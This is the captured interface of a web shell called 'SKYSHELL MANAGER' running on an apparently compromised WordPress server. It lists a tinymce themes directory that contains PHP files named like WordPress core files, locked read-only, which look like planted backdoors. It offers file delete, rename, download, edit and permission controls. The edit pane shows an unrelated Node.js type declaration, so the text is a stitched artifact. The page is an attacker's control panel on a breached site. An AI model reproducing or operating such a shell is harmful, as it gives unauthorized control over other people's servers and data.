📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: constants.d.ts
/** @deprecated since v6.3.0 - use constants property exposed by the relevant module instead. */ declare module "constants" { import { constants as osConstants, SignalConstants } from "node:os"; import { constants as cryptoConstants } from "node:crypto"; import { constants as fsConstants } from "node:fs"; const exp: & typeof osConstants.errno & typeof osConstants.priority & SignalConstants & typeof cryptoConstants & typeof fsConstants; export = exp; } declare module "node:constants" { import constants = require("constants"); export = constants; }
Save